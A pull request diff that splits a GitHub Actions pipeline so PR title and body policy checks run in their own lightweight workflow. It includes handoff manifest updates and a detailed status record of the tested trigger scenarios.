### PR TITLE
ci: separate PR metadata policy from code validation

### DIFF
--- a/.ai/handoff/DASHBOARD.md
+++ b/.ai/handoff/DASHBOARD.md
@@ -16,7 +16,7 @@ Current package inventory and CI gate wiring are generated below.
 | Version | 5.27.0 |
 | Node engines | >=20.0.0 |
 | Source modules | 74 under `src/` |
-| Test files | 114 under `src/__tests__/` |
+| Test files | 115 under `src/__tests__/` |
 | tsconfig `types: ["node"]` | yes |
 | Build / test / audit gates | enforced in required CI - see below |
 

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,9 +3,9 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1787220821",
-    "timestamp": "2026-08-20T10:13:42Z",
-    "commit": "50da1b3",
+    "session_id": "cli-1787221454",
+    "timestamp": "2026-08-20T10:24:16Z",
+    "commit": "6c74849",
     "phase": "idle",
     "duration_minutes": 0
   },
@@ -24,7 +24,7 @@
     },
     "LOG.md": {
       "checksum": "sha256:df02447ed46de8d46e4f2387f6c4cdc20a01c0929a733bc3db9b1c3238fad584",
-      "updated": "2026-08-20T10:13:41Z",
+      "updated": "2026-08-20T10:24:13Z",
       "lines": 154,
       "summary": "This generated journal lists every release derived from CHANGELOG.md, newest first."
     },
@@ -42,13 +42,13 @@
     },
     "DASHBOARD.md": {
       "checksum": "sha256:87585d1a7f6af0e3d0e71674c492367ce1898f987200eca8310a0d20b750b524",
-      "updated": "2026-08-20T10:13:41Z",
+      "updated": "2026-08-20T10:24:13Z",
       "lines": 70,
       "summary": "Current package inventory and CI gate wiring are generated below."
     },
     "TRUST.md": {
       "checksum": "sha256:f3c42810ec8e0f07276230376f402689d323a0e4665439badf58f05593ae2ccc",
-      "updated": "2026-08-20T10:13:41Z",
+      "updated": "2026-08-20T10:24:13Z",
       "lines": 62,
       "summary": "Provenance and status are tracked independently."
     },

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,17 +3,17 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1787221701",
-    "timestamp": "2026-08-20T10:28:23Z",
-    "commit": "03e75fd",
+    "session_id": "cli-1787221889",
+    "timestamp": "2026-08-20T10:31:30Z",
+    "commit": "a43f8a7",
     "phase": "idle",
     "duration_minutes": 0
   },
   "files": {
     "STATUS.md": {
-      "checksum": "sha256:1047aad62f83899a0f5b4d6e7b33e9649203f36700cc4b491d6a2923a9298380",
-      "updated": "2026-08-20T10:13:39Z",
-      "lines": 2195,
+      "checksum": "sha256:0c5906258b426a423bba203e4ec4d90e61a17f26e285ed3ef463408fa55436a4",
+      "updated": "2026-08-20T10:30:01Z",
+      "lines": 2203,
       "summary": "Model: claude-opus-5. Branch docs/recommend-exact-pinning. No version bump."
     },
     "NEXT_ACTIONS.md": {
@@ -24,7 +24,7 @@
     },
     "LOG.md": {
       "checksum": "sha256:df02447ed46de8d46e4f2387f6c4cdc20a01c0929a733bc3db9b1c3238fad584",
-      "updated": "2026-08-20T10:28:21Z",
+      "updated": "2026-08-20T10:31:27Z",
       "lines": 154,
       "summary": "This generated journal lists every release derived from CHANGELOG.md, newest first."
     },
@@ -42,13 +42,13 @@
     },
     "DASHBOARD.md": {
       "checksum": "sha256:87585d1a7f6af0e3d0e71674c492367ce1898f987200eca8310a0d20b750b524",
-      "updated": "2026-08-20T10:28:21Z",
+      "updated": "2026-08-20T10:31:27Z",
       "lines": 70,
       "summary": "Current package inventory and CI gate wiring are generated below."
     },
     "TRUST.md": {
       "checksum": "sha256:f3c42810ec8e0f07276230376f402689d323a0e4665439badf58f05593ae2ccc",
-      "updated": "2026-08-20T10:28:21Z",
+      "updated": "2026-08-20T10:31:27Z",
       "lines": 62,
       "summary": "Provenance and status are tracked independently."
     },
@@ -80,8 +80,8 @@
   "quick_context": "Model: claude-opus-5. Branch docs/recommend-exact-pinning. No version bump. Five tasks are ready, one owner decision is blocked, and T-008/T-015/T-016/T-017/T-018/T-019 are complete. ",
   "token_budget": {
     "manifest_only": 85,
-    "manifest_plus_core": 26562,
-    "full_read": 37501
+    "manifest_plus_core": 26659,
+    "full_read": 37598
   }
   ,"next_task_id": 20
   ,"tasks": {"T-008":{"title":"Adopt AAHP 3.9.1 and close verified scanner and CI defects","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z","completed":"2026-08-04T08:15:48Z"},"T-009":{"title":"Implement full offline sigstore verification","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-010":{"title":"Add a first-class known-bad VS Code extension ID IOC type","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-011":{"title":"Verify remaining Digest-78 indicators before ingestion","status":"ready","priority":"medium","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-012":{"title":"Profile structural matcher cost under V8 coverage","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-013":{"title":"Move to Babel 8 and a supported Node line","status":"blocked","priority":"medium","depends_on":[],"blocked_by":"Owner decision on raising package engines and both CI jobs together","created":"2026-08-04T08:00:00Z"},"T-014":{"title":"Remove external zip dependency from VS Code test fixtures","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T10:00:00Z"},"T-015":{"title":"Fix packaged self-scan own-definition false positive","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T09:24:00Z","completed":"2026-08-04T09:27:00Z"},"T-016":{"title":"Version-pinned npm IOCs match on a directory scan via the lockfile path","status":"done","priority":"high","depends_on":[],"created":"2026-08-06T09:00:00Z"},"T-017":{"title":"Index matchBareNpmIOC so npm IOC lookup is O(1) like matchPackageIOC","status":"done","priority":"medium","depends_on":[],"created":"2026-08-06T09:30:00Z"},"T-018":{"title":"Match known-malware hashes against real file digests, not just digest text in content","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"},"T-019":{"title":"Dropped-persistence detection (tranches 1 and 2)","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"}}

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,9 +3,9 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1787221454",
-    "timestamp": "2026-08-20T10:24:16Z",
-    "commit": "6c74849",
+    "session_id": "cli-1787221701",
+    "timestamp": "2026-08-20T10:28:23Z",
+    "commit": "03e75fd",
     "phase": "idle",
     "duration_minutes": 0
   },
@@ -24,7 +24,7 @@
     },
     "LOG.md": {
       "checksum": "sha256:df02447ed46de8d46e4f2387f6c4cdc20a01c0929a733bc3db9b1c3238fad584",
-      "updated": "2026-08-20T10:24:13Z",
+      "updated": "2026-08-20T10:28:21Z",
       "lines": 154,
       "summary": "This generated journal lists every release derived from CHANGELOG.md, newest first."
     },
@@ -42,13 +42,13 @@
     },
     "DASHBOARD.md": {
       "checksum": "sha256:87585d1a7f6af0e3d0e71674c492367ce1898f987200eca8310a0d20b750b524",
-      "updated": "2026-08-20T10:24:13Z",
+      "updated": "2026-08-20T10:28:21Z",
       "lines": 70,
       "summary": "Current package inventory and CI gate wiring are generated below."
     },
     "TRUST.md": {
       "checksum": "sha256:f3c42810ec8e0f07276230376f402689d323a0e4665439badf58f05593ae2ccc",
-      "updated": "2026-08-20T10:24:13Z",
+      "updated": "2026-08-20T10:28:21Z",
       "lines": 62,
       "summary": "Provenance and status are tracked independently."
     },

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,17 +3,17 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1787221889",
-    "timestamp": "2026-08-20T10:31:30Z",
-    "commit": "a43f8a7",
+    "session_id": "cli-1787222321",
+    "timestamp": "2026-08-20T10:38:43Z",
+    "commit": "3b92109",
     "phase": "idle",
     "duration_minutes": 0
   },
   "files": {
     "STATUS.md": {
-      "checksum": "sha256:0c5906258b426a423bba203e4ec4d90e61a17f26e285ed3ef463408fa55436a4",
-      "updated": "2026-08-20T10:30:01Z",
-      "lines": 2203,
+      "checksum": "sha256:582342f0cedb751fe94108b8e85b6be60c8ae874051978d42932d4efd06a4112",
+      "updated": "2026-08-20T10:38:35Z",
+      "lines": 2255,
       "summary": "Model: claude-opus-5. Branch docs/recommend-exact-pinning. No version bump."
     },
     "NEXT_ACTIONS.md": {
@@ -24,7 +24,7 @@
     },
     "LOG.md": {
       "checksum": "sha256:df02447ed46de8d46e4f2387f6c4cdc20a01c0929a733bc3db9b1c3238fad584",
-      "updated": "2026-08-20T10:31:27Z",
+      "updated": "2026-08-20T10:38:40Z",
       "lines": 154,
       "summary": "This generated journal lists every release derived from CHANGELOG.md, newest first."
     },
@@ -42,13 +42,13 @@
     },
     "DASHBOARD.md": {
       "checksum": "sha256:87585d1a7f6af0e3d0e71674c492367ce1898f987200eca8310a0d20b750b524",
-      "updated": "2026-08-20T10:31:27Z",
+      "updated": "2026-08-20T10:38:40Z",
       "lines": 70,
       "summary": "Current package inventory and CI gate wiring are generated below."
     },
     "TRUST.md": {
       "checksum": "sha256:f3c42810ec8e0f07276230376f402689d323a0e4665439badf58f05593ae2ccc",
-      "updated": "2026-08-20T10:31:27Z",
+      "updated": "2026-08-20T10:38:40Z",
       "lines": 62,
       "summary": "Provenance and status are tracked independently."
     },
@@ -80,8 +80,8 @@
   "quick_context": "Model: claude-opus-5. Branch docs/recommend-exact-pinning. No version bump. Five tasks are ready, one owner decision is blocked, and T-008/T-015/T-016/T-017/T-018/T-019 are complete. ",
   "token_budget": {
     "manifest_only": 85,
-    "manifest_plus_core": 26659,
-    "full_read": 37598
+    "manifest_plus_core": 27605,
+    "full_read": 38544
   }
   ,"next_task_id": 20
   ,"tasks": {"T-008":{"title":"Adopt AAHP 3.9.1 and close verified scanner and CI defects","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z","completed":"2026-08-04T08:15:48Z"},"T-009":{"title":"Implement full offline sigstore verification","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-010":{"title":"Add a first-class known-bad VS Code extension ID IOC type","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-011":{"title":"Verify remaining Digest-78 indicators before ingestion","status":"ready","priority":"medium","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-012":{"title":"Profile structural matcher cost under V8 coverage","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-013":{"title":"Move to Babel 8 and a supported Node line","status":"blocked","priority":"medium","depends_on":[],"blocked_by":"Owner decision on raising package engines and both CI jobs together","created":"2026-08-04T08:00:00Z"},"T-014":{"title":"Remove external zip dependency from VS Code test fixtures","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T10:00:00Z"},"T-015":{"title":"Fix packaged self-scan own-definition false positive","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T09:24:00Z","completed":"2026-08-04T09:27:00Z"},"T-016":{"title":"Version-pinned npm IOCs match on a directory scan via the lockfile path","status":"done","priority":"high","depends_on":[],"created":"2026-08-06T09:00:00Z"},"T-017":{"title":"Index matchBareNpmIOC so npm IOC lookup is O(1) like matchPackageIOC","status":"done","priority":"medium","depends_on":[],"created":"2026-08-06T09:30:00Z"},"T-018":{"title":"Match known-malware hashes against real file digests, not just digest text in content","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"},"T-019":{"title":"Dropped-persistence detection (tranches 1 and 2)","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"}}

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,76 +3,76 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1787219431",
-    "timestamp": "2026-08-20T09:50:32Z",
-    "commit": "c5ef04a",
+    "session_id": "cli-1787220821",
+    "timestamp": "2026-08-20T10:13:42Z",
+    "commit": "50da1b3",
     "phase": "idle",
     "duration_minutes": 0
   },
   "files": {
     "STATUS.md": {
-      "checksum": "sha256:6ff2cd15cd4db3575dae8cd594d2a91ebbeca60db3f6d415ac549ba2ce2fe478",
-      "updated": "2026-08-20T09:50:28Z",
-      "lines": 2137,
+      "checksum": "sha256:1047aad62f83899a0f5b4d6e7b33e9649203f36700cc4b491d6a2923a9298380",
+      "updated": "2026-08-20T10:13:39Z",
+      "lines": 2195,
       "summary": "Model: claude-opus-5. Branch docs/recommend-exact-pinning. No version bump."
     },
     "NEXT_ACTIONS.md": {
       "checksum": "sha256:b68600a70a1c213c272fee5eef6a0047fd695c8dd6d4c7160e2c9dc4d3ba683f",
-      "updated": "2026-08-20T09:48:46Z",
+      "updated": "2026-08-20T10:05:07Z",
       "lines": 168,
       "summary": "Five tasks are ready, one owner decision is blocked, and T-008/T-015/T-016/T-017/T-018/T-019 are complete."
     },
     "LOG.md": {
       "checksum": "sha256:df02447ed46de8d46e4f2387f6c4cdc20a01c0929a733bc3db9b1c3238fad584",
-      "updated": "2026-08-20T09:50:30Z",
+      "updated": "2026-08-20T10:13:41Z",
       "lines": 154,
       "summary": "This generated journal lists every release derived from CHANGELOG.md, newest first."
     },
     "LOG-ARCHIVE.md": {
       "checksum": "sha256:e566ec8a4b80bba4b488aa69c5bf0e2a4ef1753046f18b81afe80a6846c73149",
-      "updated": "2026-08-20T09:48:46Z",
+      "updated": "2026-08-20T10:05:07Z",
       "lines": 132,
       "summary": "**Agent:** Claude Opus 4.8 (claude-opus-4-8)"
     },
     "LOG-ARCHIVE.index.json": {
       "checksum": "sha256:94b2e7524ade23f11edc97075afc33bc9884288661336bb6ce279d6928d22c62",
-      "updated": "2026-08-20T09:48:46Z",
+      "updated": "2026-08-20T10:05:07Z",
       "lines": 11,
       "summary": "{"
     },
     "DASHBOARD.md": {
-      "checksum": "sha256:198dd08d15a114f8d3cd725c7a33c41f1eb61c7be28178761594b099ab603c67",
-      "updated": "2026-08-20T09:50:30Z",
+      "checksum": "sha256:87585d1a7f6af0e3d0e71674c492367ce1898f987200eca8310a0d20b750b524",
+      "updated": "2026-08-20T10:13:41Z",
       "lines": 70,
       "summary": "Current package inventory and CI gate wiring are generated below."
     },
     "TRUST.md": {
-      "checksum": "sha256:0c577a2f7526535d5e6a550b588ed7d0bf36a36902f3ed8ba9be49a75d6a0ea3",
-      "updated": "2026-08-20T09:50:30Z",
+      "checksum": "sha256:f3c42810ec8e0f07276230376f402689d323a0e4665439badf58f05593ae2ccc",
+      "updated": "2026-08-20T10:13:41Z",
       "lines": 62,
       "summary": "Provenance and status are tracked independently."
     },
     "CONVENTIONS.md": {
       "checksum": "sha256:efc9f9fe67b36f4e872a96e49798168a2c6950e4ec1550bbc7bca6c06184c7a2",
-      "updated": "2026-08-20T09:48:46Z",
+      "updated": "2026-08-20T10:05:07Z",
       "lines": 206,
       "summary": "- All code, comments, commits, and documentation in **English only**"
     },
     "WORKFLOW.md": {
       "checksum": "sha256:45ae947add23bf4d9bb2a2bb009f4acbdd00b7fe1531912f9693dea1e48bc3b9",
-      "updated": "2026-08-20T09:48:46Z",
+      "updated": "2026-08-20T10:05:07Z",
       "lines": 164,
       "summary": "MANIFEST.json tasks is the authoritative machine-readable task graph."
     },
     "GROUNDING.md": {
       "checksum": "sha256:d3744f97b8190fbc73b3fbd44df70cc343d23b99cdc1e92eee686929212b151e",
-      "updated": "2026-08-20T09:48:46Z",
+      "updated": "2026-08-20T10:05:07Z",
       "lines": 209,
       "summary": "This register extends AAHP machinery without replacing it."
     },
     "pii-allowlist.json": {
       "checksum": "sha256:7c1051f6e2bc3943b7c1dbe4da229694455681b8875a346c99279e555edb733f",
-      "updated": "2026-08-20T09:48:46Z",
+      "updated": "2026-08-20T10:05:07Z",
       "lines": 4,
       "summary": "{"
     }
@@ -80,8 +80,8 @@
   "quick_context": "Model: claude-opus-5. Branch docs/recommend-exact-pinning. No version bump. Five tasks are ready, one owner decision is blocked, and T-008/T-015/T-016/T-017/T-018/T-019 are complete. ",
   "token_budget": {
     "manifest_only": 85,
-    "manifest_plus_core": 25821,
-    "full_read": 36760
+    "manifest_plus_core": 26562,
+    "full_read": 37501
   }
   ,"next_task_id": 20
   ,"tasks": {"T-008":{"title":"Adopt AAHP 3.9.1 and close verified scanner and CI defects","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z","completed":"2026-08-04T08:15:48Z"},"T-009":{"title":"Implement full offline sigstore verification","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-010":{"title":"Add a first-class known-bad VS Code extension ID IOC type","status":"ready","priority":"high","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-011":{"title":"Verify remaining Digest-78 indicators before ingestion","status":"ready","priority":"medium","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-012":{"title":"Profile structural matcher cost under V8 coverage","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T08:00:00Z"},"T-013":{"title":"Move to Babel 8 and a supported Node line","status":"blocked","priority":"medium","depends_on":[],"blocked_by":"Owner decision on raising package engines and both CI jobs together","created":"2026-08-04T08:00:00Z"},"T-014":{"title":"Remove external zip dependency from VS Code test fixtures","status":"ready","priority":"low","depends_on":[],"created":"2026-08-04T10:00:00Z"},"T-015":{"title":"Fix packaged self-scan own-definition false positive","status":"done","priority":"high","depends_on":[],"created":"2026-08-04T09:24:00Z","completed":"2026-08-04T09:27:00Z"},"T-016":{"title":"Version-pinned npm IOCs match on a directory scan via the lockfile path","status":"done","priority":"high","depends_on":[],"created":"2026-08-06T09:00:00Z"},"T-017":{"title":"Index matchBareNpmIOC so npm IOC lookup is O(1) like matchPackageIOC","status":"done","priority":"medium","depends_on":[],"created":"2026-08-06T09:30:00Z"},"T-018":{"title":"Match known-malware hashes against real file digests, not just digest text in content","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"},"T-019":{"title":"Dropped-persistence detection (tranches 1 and 2)","status":"done","priority":"high","depends_on":[],"created":"2026-08-12T09:00:00Z"}}

--- a/.ai/handoff/STATUS.md
+++ b/.ai/handoff/STATUS.md
@@ -107,6 +107,64 @@ already holds 19 of GitHub's 20-topic maximum, so exactly ONE slot is free
 against 9 proposed additions. Which one, and whether any existing topic is worth
 trading, is deferred to a separate prioritisation review.
 
+## CI trigger split: metadata policy separated from code validation (2026-08-20)
+
+Model: claude-opus-5. Branch ci/split-metadata-policy. No version bump.
+
+**The defect.** `edited` sat in ci.yml's `pull_request` types so the AI-attribution
+gate would re-run when a PR title or body changed. Every metadata edit therefore
+started the full build, test, package and security pipeline against a head commit
+whose content had not changed. Whether the duplicate blocked a merge depended on
+which run finished last: on the v5.26.7 cut the cancelled twin was last and blocked
+it, on v5.27.0 the successful one was last and it did not. That is timing, not
+design, and it was reproduced again on 2026-08-20 when two PR-body edits on #158
+produced a third run on one SHA.
+
+**Why the trigger could not simply be deleted.** The gate covers four surfaces, and
+they do not share an input. PR title and PR body are metadata. Commit messages and
+the author/committer identity fields are read from the BASE..HEAD range and change
+only when the code changes. Removing `edited` without moving the first two would
+have left a PR able to go green and then have an attribution footer pasted into the
+body with nothing re-checking it, on a public repo where that rule is CI-enforced.
+
+**The split.** `pr-metadata-policy.yml` owns the title and body checks and the new
+`PR metadata policy` check name, on `[opened, edited, reopened]`, with no checkout,
+so it reads only the event payload and cannot execute PR code. ci.yml keeps the
+commit-message and identity checks inside `Build and Test` on
+`[opened, synchronize, reopened, ready_for_review]`. Each required check now has
+exactly one producing workflow, and the two use separate concurrency groups, so a
+metadata edit can no longer cancel an in-flight code-validation run.
+
+**No PAT is required, and the earlier claim that one was is withdrawn.** It
+conflated the Actions `GITHUB_TOKEN`, which genuinely lacks `administration`, with
+the maintainer token used from the workstation, which reports `admin=true` and
+already read the protection settings. Branch protection is updated from the
+workstation, not from a workflow, so no write-capable credential is introduced and
+nothing new is reachable from untrusted pull-request code.
+
+**Ordering, and the window it leaves.** The new check name cannot be required
+before the workflow exists on `main`, or every PR blocks on a check that never
+runs. So: merge first, then add `PR metadata policy` to
+`required_status_checks.contexts`. Between those two steps the metadata check still
+RUNS and reports, it is simply not yet blocking. That window is seconds long and is
+recorded here rather than glossed.
+
+**Regression mechanism.** `src/__tests__/workflow-trigger-contract.test.ts` encodes
+the event-to-workflow matrix and fails if `edited` returns to ci.yml, if the
+title/body checks move back into the build job, if the commit-range checks leave it,
+if a check name gains a second producer, if the concurrency groups collide, if the
+metadata job gains a checkout, if the two attribution patterns drift apart, or if
+the dependabot exemption moves from step level to job level.
+
+Mutation proof, four mutations, each caught: re-adding `edited`, moving `PR_TITLE`
+back into ci.yml, sharing one concurrency group, and giving the metadata job a
+checkout. The concurrency mutation initially SURVIVED, because the test compared
+raw strings and `ci-${{ ...number }}` differs textually from
+`ci-${{ ...number || github.ref }}` while resolving to the same group on a
+pull_request event. The assertion now resolves the `||` fallback for that event
+before comparing. Recorded because the first version looked like a proof and was
+not.
+
 ## Carried open items (process and design, not tied to one sweep)
 
 ### Duplicate CI runs: do NOT simply drop the `edited` PR trigger

--- a/.ai/handoff/STATUS.md
+++ b/.ai/handoff/STATUS.md
@@ -149,6 +149,14 @@ runs. So: merge first, then add `PR metadata policy` to
 RUNS and reports, it is simply not yet blocking. That window is seconds long and is
 recorded here rather than glossed.
 
+**Trigger sets, after the scenario run.** Code validation takes
+`[opened, synchronize, reopened, ready_for_review]`; metadata policy takes
+`[opened, edited, reopened, synchronize]`. The asymmetry is the point: ci.yml must
+not see `edited` because its job costs two minutes and metadata cannot change
+code, and the metadata workflow must see `synchronize` because a required check is
+evaluated against the head commit's check-runs and therefore has to exist on every
+sha, which six seconds with no checkout makes affordable.
+
 **Regression mechanism.** `src/__tests__/workflow-trigger-contract.test.ts` encodes
 the event-to-workflow matrix and fails if `edited` returns to ci.yml, if the
 title/body checks move back into the build job, if the commit-range checks leave it,

--- a/.ai/handoff/STATUS.md
+++ b/.ai/handoff/STATUS.md
@@ -157,6 +157,58 @@ code, and the metadata workflow must see `synchronize` because a required check 
 evaluated against the head commit's check-runs and therefore has to exist on every
 sha, which six seconds with no checkout makes affordable.
 
+**Scenario record.** Every scenario below was executed against PR #159 and the
+result read back from the API, not inferred. `CI` produces the `Build and Test`
+required check, `PR Metadata Policy` produces `PR metadata policy`, `AAHP Verify`
+produces `aahp-verify`.
+
+| # | event | head sha | runs created on that sha | conclusions | cancellation | branch-protection state |
+| --- | --- | --- | --- | --- | --- | --- |
+| A | opened | 6c74849 | CI, AAHP Verify, PR Metadata Policy | all success | none | BLOCKED then CLEAN once the build finished |
+| B | edited (title only) | 6c74849 | PR Metadata Policy only, CI count unchanged at 1 | success | none, the in-flight build kept running | unchanged |
+| C | edited (body only) | 3b92109 | PR Metadata Policy only, CI count unchanged at 1 | success | none | unchanged |
+| D | synchronize | 03e75fd | CI, AAHP Verify, and NO metadata run | success | none | see the defect this exposed, below |
+| E | two commits ~30s apart | 03beef5 then a43f8a7 | CI on both | superseded CI cancelled, newest sha conclusive | correct, obsolete run cancelled | decided by the newest sha only |
+| F | edited while a build was in progress | 6c74849 | PR Metadata Policy | success | the running CI run was NOT cancelled | unchanged |
+| G | violating title or body | n/a, harness | gate script from the workflow yaml | 11/11 expectations met | n/a | n/a |
+| H | violation fixed | 3b92109 | AAHP Verify | failure to success | none | BLOCKED to CLEAN |
+| I | required check failing | a43f8a7 | aahp-verify failed on a real drift | failure | none | BLOCKED |
+| J | re-run | 3b92109 | none, `gh run rerun` re-runs IN PLACE | success | n/a | CLEAN |
+
+**Scenario D found a defect in the first version of this split, and it would have
+deadlocked the repo.** The metadata workflow originally omitted `synchronize` on
+the reasoning that a new head commit cannot change a title or body. True, and
+irrelevant: a required status check is evaluated against the check-runs attached
+to the HEAD COMMIT, so head sha 03e75fd carried a CI run, an AAHP Verify run and
+zero metadata runs. Adding `PR metadata policy` to the required contexts would
+then have blocked every PR that received a push after being opened, forever, on a
+check that never arrives. Found by running the scenario, not by reading the
+config, which is the reason for running them.
+
+**Scenarios G and H were run as a harness rather than by editing the PR, on
+purpose.** The violating input IS an AI-attribution footer, this repo is public,
+and GitHub keeps PR title and body edit history visible permanently. Publishing
+one to test the gate that forbids publishing them is self-defeating. The harness
+executes the PATTERN extracted from the workflow yaml, so it cannot drift from
+what CI runs, and covers seven violating forms plus four that must NOT trip,
+including this project's own threat intelligence naming the brand and prose
+describing the rule. The platform link the harness cannot prove, that a failing
+step becomes a failing required check and blocks the merge, was proven live
+instead by scenario I.
+
+**On the cancelled-twin question, which is what started this.** Scenario F's
+follow-up put a cancelled and a successful run of the SAME required check name on
+ONE head sha (runs 32358446823 cancelled and 32358449384 success on 6c74849) and
+the PR still read CLEAN, so GitHub evaluates the newest run for a context. That is
+structural rather than lucky: cancel-in-progress only cancels a run that a newer
+run in the same group has just superseded, and the newer run then runs to
+completion. The v5.26.7 block therefore remains UNEXPLAINED by cancellation alone
+and was not reproduced in this session. What is claimed here is narrower and
+measured: the generator of same-sha duplicate CI runs, the `edited` trigger, is
+gone, and a title or body edit now provably creates no CI run at all. The recorded
+remedy in CONVENTIONS.md stays, and scenario J confirms `gh run rerun` re-runs in
+place and leaves the check conclusive.
+
 **Regression mechanism.** `src/__tests__/workflow-trigger-contract.test.ts` encodes
 the event-to-workflow matrix and fails if `edited` returns to ci.yml, if the
 title/body checks move back into the build job, if the commit-range checks leave it,

--- a/.ai/handoff/TRUST.md
+++ b/.ai/handoff/TRUST.md
@@ -45,7 +45,7 @@ Every participating record carries the Grounded Reflection fields. Expired
 |----------|-------|--------------|
 | package.json version | 5.27.0 | package.json |
 | Source modules present | 74 | src/ file list |
-| Test files present | 114 | src/__tests__/ file list |
+| Test files present | 115 | src/__tests__/ file list |
 | tsconfig `types: ["node"]` | yes | tsconfig.json |
 | Runtime dependency | commander ^14.0.3 | package.json |
 

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -11,10 +11,18 @@ on:
       - 'v[0-9]+.[0-9]+.[0-9]+'
   pull_request:
     branches: [main]
-    # `edited` is required by the AI-attribution gate below. The default types are
-    # opened/synchronize/reopened, none of which fire on a title or body edit, so
-    # without it a PR can go green and then have the footer pasted into the body.
-    types: [opened, synchronize, reopened, edited]
+    # Code-validation event set: every event that can change the code or the
+    # effective merge result, and nothing else.
+    #
+    # `edited` is deliberately ABSENT. It was here so the AI-attribution gate
+    # re-ran on a title or body edit, which meant every metadata edit started the
+    # full build, test, package and security pipeline against a head commit whose
+    # content had not changed. That half of the gate now lives in
+    # pr-metadata-policy.yml, which owns the "PR metadata policy" required check.
+    #
+    # `ready_for_review` is present because leaving draft changes whether the PR is
+    # a merge candidate, and the required check must be conclusive for it.
+    types: [opened, synchronize, reopened, ready_for_review]
   # Manual runs are build-only. Publishing is possible only from an immutable
   # semver tag delivered by the push trigger above.
   workflow_dispatch:
@@ -22,10 +30,14 @@ on:
 permissions:
   contents: read
 
-# Adding `edited` to the PR triggers means title/body edits now spawn runs on the same
-# head sha. Without a concurrency group a run started before a body fix can finish after
-# the run started by the fix, leaving the REQUIRED context reporting the stale red. Tag
-# and main pushes are keyed by ref so a release is never cancelled by a later one.
+# Obsolete code-validation runs are cancelled when a NEWER HEAD COMMIT supersedes
+# them, so the newest head sha decides mergeability. Metadata edits can no longer
+# enter this group at all, because `edited` is not a trigger here - so a body fix
+# can never cancel a valid result for an unchanged head sha, which is how a
+# cancelled twin previously became the effective result and blocked a merge.
+#
+# Tag and main pushes are keyed by ref and never cancelled, so a release cannot be
+# aborted by a later one.
 concurrency:
   group: ci-${{ github.event.pull_request.number || github.ref }}
   cancel-in-progress: ${{ github.event_name == 'pull_request' }}
@@ -55,31 +67,32 @@ jobs:
       - name: Build
         run: npm run build
 
-      # AI-attribution gate for the two surfaces that are NOT files in the repo:
-      # the PR title/body and the commit messages. Tracked files (CHANGELOG.md,
-      # which ci.yml turns into the GitHub Release body, plus README/docs) are
-      # covered by the "ai-attribution" forbiddenPatterns rule in aahp.config.json,
-      # which already ran as part of `npm run build` above.
+      # AI-attribution gate for the COMMIT surfaces: commit messages and the
+      # author/committer identity fields across the PR's BASE..HEAD range. Their
+      # input is the commit range, so they belong with code validation and re-run
+      # only when the code changes.
       #
-      # This lives inside "Build and Test" on purpose: that job is a REQUIRED
-      # status check on main, so the gate blocks a merge today. A new top-level
-      # job would be advisory only until branch protection is updated to require it.
-      # dependabot is exempt for the same reason aahp-verify.yml exempts it: its PR
-      # bodies quote upstream release notes verbatim, it cannot edit its own body,
-      # and this step sits in a REQUIRED check with enforce_admins - so a quoted
-      # trailer upstream would hard-block a security update with no way out.
-      - name: No AI attribution in PR body or commit messages
+      # The PR TITLE and BODY halves moved to pr-metadata-policy.yml, which owns
+      # the "PR metadata policy" required check. Do not re-add them here: that is
+      # what forced `edited` into this workflow's triggers and made every body edit
+      # run the whole pipeline. One producer per required check.
+      #
+      # Tracked files (CHANGELOG.md, which ci.yml turns into the GitHub Release
+      # body, plus README/docs) are covered by the "ai-attribution"
+      # forbiddenPatterns rule in aahp.config.json, which already ran as part of
+      # `npm run build` above.
+      #
+      # dependabot is exempt for the same reason aahp-verify.yml exempts it: its
+      # commit messages quote upstream release notes, and this step sits in a
+      # REQUIRED check with enforce_admins - so a quoted trailer upstream would
+      # hard-block a security update with no way out.
+      - name: No AI attribution in commit messages or identity
         if: github.event_name == 'pull_request' && github.actor != 'dependabot[bot]'
         env:
-          # The PR title and body are attacker-controlled: anyone who can open a PR
-          # from a fork controls them. They MUST reach the script as environment
-          # variables. Never write ${{ github.event.pull_request.body }} inside a
